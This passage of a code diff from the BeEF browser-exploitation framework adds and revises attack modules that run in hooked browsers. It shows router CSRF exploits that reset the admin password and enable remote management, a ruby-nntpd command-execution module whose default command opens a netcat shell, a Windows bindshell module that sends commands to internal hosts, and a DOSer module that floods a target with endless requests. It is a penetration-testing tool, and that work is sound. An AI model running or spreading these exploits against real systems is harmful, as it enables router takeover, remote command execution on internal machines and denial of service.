+    document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/virgin_superhub_csrf/command.js

@@ -9,30 +9,31 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
 	var port    = '<%= @port %>';
+	var timeout = 15;
 
-	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
-		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
-		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
 	]);
 
-	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
-		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
 	]);
 
-	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
-		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
-		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
+		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
 	]);
 
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(virgin_superhub_iframe1);
-		document.body.removeChild(virgin_superhub_iframe2);
-		document.body.removeChild(virgin_superhub_iframe3);
+		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
+		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/ruby_nntpd_cmd_exec/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/ruby_nntpd_cmd_exec/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ruby_nntpd_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "ruby-nntpd Command Execution"
+            description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]

modules/exploits/ruby_nntpd_cmd_exec/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '1119'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

modules/exploits/zenoss_daemon_csrf/command.js

@@ -1,23 +0,0 @@
-//
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-  var base = '<%= @base %>'; 
-  var service = '<%= @service %>';
-  var action = '<%= @action %>';
-
-  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
-  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
-
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
-
-  cleanup = function() {
-    document.body.removeChild(zenoss_daemon_iframe);
-  }
-  setTimeout("cleanup()", 15000);
-
-});
-

modules/exploits/zenoss_daemon_csrf/module.rb

@@ -1,60 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Zenoss_daemon_csrf < BeEF::Core::Command
-  
-	def self.options
-		return [
-			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
-			{ 'name' => 'service',
-				'type' => 'combobox',
-				'ui_label' => 'Daemon',
-				'store_type' => 'arraystore',
-				'store_fields' => ['service', 'description'],
-				'store_data' => [
-					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
-					['zopectl', 'zopectl (The Zope open source web application server)'],
-					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
-					['zenjobs', 'zenjobs (Zenjobs)'],
-					['zenping', 'zenping (ICMP ping status monitoring)'],
-					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
-					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
-					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
-					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
-					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
-					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
-					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
-					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
-					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
-					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
-					['zenjmx', 'zenjmx (ZenJMX)']
-				],
-				'emptyText' => 'Select a daemon',
-				'valueField' => 'service',
-				'displayField' => 'service', #'description',
-				'mode' => 'local',
-				'autoWidth' => true
-			},
-			{ 'name' => 'action',
-				'type' => 'combobox',
-				'ui_label' => 'Action',
-				'store_type' => 'arraystore',
-				'store_fields' => ['action'],
-				'store_data' => [
-					['Start'],['Stop'],['Restart']
-				],
-				'valueField' => 'action',
-				'displayField' => 'action',
-				'mode' => 'local',
-				'autoWidth' => true
-			}
-		]
-	end
-
-	def post_execute
-		save({'result' => @datastore['result']})
-	end
-
-end

modules/host/detect_bitdefender2012/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var temp=document.body.innerHTML;
+    var key="netdefender/hui/ndhui.js";
+    if(temp.indexOf(key)>0) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
+    } else {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
+    };
+
+});
+

modules/host/detect_bitdefender2012/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_bitdefender2012:
+            enable: true
+            category: "Host"
+            name: "Detect Bit Defender 2012"
+            description: "This module detect the javascript code automatically included by Bitdefender 2012"
+            authors: ["nbblrr"]
+            target:
+                working: ["ALL"]

modules/host/detect_bitdefender2012/module.rb

@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Detect_bitdefender2012 < BeEF::Core::Command
+
+  def post_execute
+    save({'BitDefender' => @datastore['bitdefender']})
+  end
+
+end

modules/ipec/inter_protocol_irc/command.js

@@ -25,12 +25,12 @@ beef.execute(function() {
 	irc_commands    += "PRIVMSG " + channel + " :" + message + "\nQUIT\n";
 
 	// send commands
-	var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands);
+	var irc_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");
 
 	// clean up
 	cleanup = function() {
-		document.body.removeChild(irc_iframe);
+		document.body.removeChild(irc_iframe_<%= @command_id %>);
 	}
 	setTimeout("cleanup()", 15000);
 

modules/ipec/inter_protocol_win_bindshell/command.js

@@ -6,74 +6,41 @@
 
 beef.execute(function() {
 
-	var target_ip = "<%= @ip %>";
-	var target_port = "<%= @port %>";
-	var cmd = "<%= @cmd %>";
-	var timeout = "<%= @command_timeout %>";
-	var internal_counter = 0;
-
-	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
-
-	var iframe = document.createElement("iframe");
-	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
-	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
-	document.body.appendChild(iframe);
-
-	function do_submit(ip, port, content) {
-
-		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
-		var parent = window.location.href;
-
-		myform=document.createElement("form");
-		myform.setAttribute("name","data");
-		myform.setAttribute("method","post");
-		myform.setAttribute("enctype","multipart/form-data");
-		myform.setAttribute("action",action);
-		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
-	
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id",<%= @command_id %>);
-		myExt.setAttribute("name",<%= @command_id %>);
-		myExt.setAttribute("value",content);
-		myform.appendChild(myExt);
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id","endTag");
-		myExt.setAttribute("name","</div>");
-		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
-
-		myform.appendChild(myExt);
-		myform.submit();
+	// validate payload
+	try {
+		var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
 	}
 
-	function waituntilok() {
-
-		try {
-			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
-				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
-				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
-				document.body.removeChild(iframe);
-				return;
-			} else throw("command results haven't been returned yet");
-		} catch (e) {
-			internal_counter++;
-			if (internal_counter > timeout) {
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
-				document.body.removeChild(iframe);
-				return;
-			}
-			setTimeout(function() {waituntilok()},1000);
-		}
+	// validate target host
+	var rhost = "<%= @rhost %>";
+	if (!rhost) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
 	}
 
-	if (!target_port || !target_ip || isNaN(target_port)) {
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
-	} else if (target_port > 65535 || target_port < 0) {
+	// validate target port
+	var rport = "<%= @rport %>";
+	if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
-	} else {
-		do_submit(target_ip, target_port, cmd);
-		waituntilok();
+		return;
 	}
 
+	// validate timeout
+	var timeout = "<%= @timeout %>";
+	if (isNaN(timeout)) timeout = 30;
+
+	// send commands
+	var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(win_ipec_form_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout * 1000);
+
 });
 

modules/ipec/inter_protocol_win_bindshell/command.old.js

@@ -0,0 +1,86 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// This is the old module which supports bi-directional communications for Firefox before version ~16
+beef.execute(function() {
+
+	var target_ip   = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd         = "<%= @cmd %>";
+	var timeout     = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
+
+	var iframe = document.createElement("iframe");
+	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
+	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+	document.body.appendChild(iframe);
+
+	function do_submit(ip, port, content) {
+
+		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
+		var parent = window.location.href;
+
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
+	
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id",<%= @command_id %>);
+		myExt.setAttribute("name",<%= @command_id %>);
+		myExt.setAttribute("value",content);
+		myform.appendChild(myExt);
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id","endTag");
+		myExt.setAttribute("name","</div>");
+		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
+
+		myform.appendChild(myExt);
+		myform.submit();
+	}
+
+	function waituntilok() {
+
+		try {
+			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
+				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
+				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
+				document.body.removeChild(iframe);
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
+				document.body.removeChild(iframe);
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	// validate target host
+	if (!target_ip) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
+	}
+
+	// validate target port
+	if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+		return;
+	}
+
+	// send commands
+	do_submit(target_ip, target_port, cmd);
+	waituntilok();
+
+});
+

modules/ipec/inter_protocol_win_bindshell/config.yaml

@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "IPEC"
             name: "Bindshell (Windows)"
-            description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
             authors: ["bcoles", "wade"]
             target:
-                working: ["FF"]
-                not_working: ["C", "S", "O", "IE"]
+                working: ["FF", "C"]
+                not_working: ["S", "O", "IE"]

modules/ipec/inter_protocol_win_bindshell/module.rb

@@ -4,67 +4,28 @@
 # See the file 'doc/COPYING' for copying permission
 #
 =begin
-[+] Summary:
-
-Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
-
-The command results are returned to the BeEF control panel.
-
-[+] Tested:
-
-o Working:
-	o Mozilla Firefox 4
-	o Mozilla Firefox 5
-
-o Not Working:
-	o Mozilla Firefox 5 with the NoScript extension
-	o Internet Explorer 8+
-	o Chrome 13
-	o Opera 11
-	o Safari 5
-
-[+] Notes:
-
-o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
-
-	o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
-
-	o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
-
-o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
-
-	[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
-	SYSTEM rule:
-	Site LOCAL
-	Accept from LOCAL
-	Deny
-
-o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
-
-o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
-
-o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
+The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
+	- use the netcat persistent listen "-L" option rather than the listen "-l" option; or
+	- remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
 
+Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however.
 =end
 
 class Inter_protocol_win_bindshell < BeEF::Core::Command
   
   def self.options
     return [
-	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
-	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
-	{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
-	{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
+	{'name'=>'rhost',   'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+	{'name'=>'rport',   'ui_label'=>'Target Port',    'value'=>'4444'},
+	{'name'=>'timeout', 'ui_label'=>'Timeout (s)',    'value'=>'30'},
+	{'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
     ]
   end
 
   def post_execute
     content = {}
     content['result'] = @datastore['result'] if not @datastore['result'].nil?
-    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
-    if content.empty?
-      content['fail'] = 'No data was returned.'
-    end
+    content['fail']   = @datastore['fail']   if not @datastore['fail'].nil?
     save content
   end
 end

modules/network/DOSer/command.js

@@ -0,0 +1,33 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var url = '<%= @url %>';
+    var delay = '<%= @delay %>';
+    var method = '<%= @method %>';
+    var post_data = '<%= @post_data %>';
+
+    if(!!window.Worker){
+    var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js');
+
+    myWorker.onmessage = function (oEvent) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data);
+    };
+
+        var data = {};
+        data['url'] = url;
+    data['delay'] = delay;
+    data['method'] = method;
+    data['post_data'] = post_data;
+
+    myWorker.postMessage(data);
+    }else{
+       beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.');
+    }
+
+
+});

modules/network/DOSer/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        doser:
+            enable: true
+            category: "Network"
+            name: "DOSer"
+            description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run."
+            authors: ["antisnatchor"]
+            target:
+                working: ["ALL"]

modules/network/DOSer/module.rb

@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Doser < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js')
+  end
+
+  def self.options
+    return [
+    	{'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'},
+      {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'},
+      {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'},
+      {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'}
+    ]
+  end
+  
+  def post_execute
+    return if @datastore['result'].nil?
+    save({'result' => @datastore['result']})
+  end
+  
+end

modules/network/DOSer/worker.js

@@ -0,0 +1,45 @@
+var url = "";
+var delay = 0;
+var method = "";
+var post_data = "";
+var counter = 0;
+
+onmessage = function (oEvent) {
+ url = oEvent.data['url'];
+ delay = oEvent.data['delay'];
+ method = oEvent.data['method'];
+ post_data = oEvent.data['post_data'];
+ doRequest();
+};
+
+function noCache(u){
+ var result = "";
+ if(u.indexOf("?") > 0){
+  result = "&" + Date.now() + Math.random();
+ }else{
+  result = "?" + Date.now() + Math.random();
+ }
+ return result;
+}
+
+function doRequest(){
+ setInterval(function(){
+
+  var xhr = new XMLHttpRequest();
+  xhr.open(method, url + noCache(url));
+  xhr.setRequestHeader('Accept','*/*');
+  xhr.setRequestHeader("Accept-Language", "en");
+  if(method == "POST"){
+    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+    xhr.send(post_data);
+  }else{
+    xhr.send(null);
+  }
+  counter++;
+
+ },delay);
+
+ setInterval(function(){
+ postMessage("Requests sent: " + counter);
+ },10000);
+}

modules/network/detect_soc_nets/command.js

@@ -17,7 +17,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date();
+	img.src = 'https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD?'+ new Date();
 	img.id = 'gmailimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {

modules/network/dns_enumeration/command.js

@@ -9,26 +9,26 @@ beef.execute(function() {
     var dns_list = "<%= @dns_list %>";
     var timeout = parseInt("<%= @timeout %>");
 
-    var cont=0; 
+    var cont=0;
     var port = 900;
     var protocol="http://";
     var hostnames;
 
     if(dns_list!="%default%") {
-        hostnames = dns_list.split(","); 
+        hostnames = dns_list.split(",");
     } else {
         hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml");
     }
-    
+
     function notify() {
         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]);
         check_next();
     }
-    
-    function check_next() { 
+
+    function check_next() {
         cont++;
-        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port); 
-        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); 
+        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port);
+        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000);
     }
 
     function do_resolv(url) {
@@ -42,15 +42,15 @@ beef.execute(function() {
         } else {
             return -1;
         }
-        
+
         xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };
         xhr.send();
-        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000);
+        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout);
     }
 
     beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded');
     if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); 
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported');
     }
 
 });

modules/phonegap/phonegap_detect/command.js

@@ -17,7 +17,8 @@ beef.execute(function() {
         + " cordova api: " + device.cordova
         + " platform: " + device.platform
         + " uuid: " + device.uuid
-        + " version: " + device.version;
+        + " version: " + device.version
+	+ " model: " + device.model;
     } catch(e) {
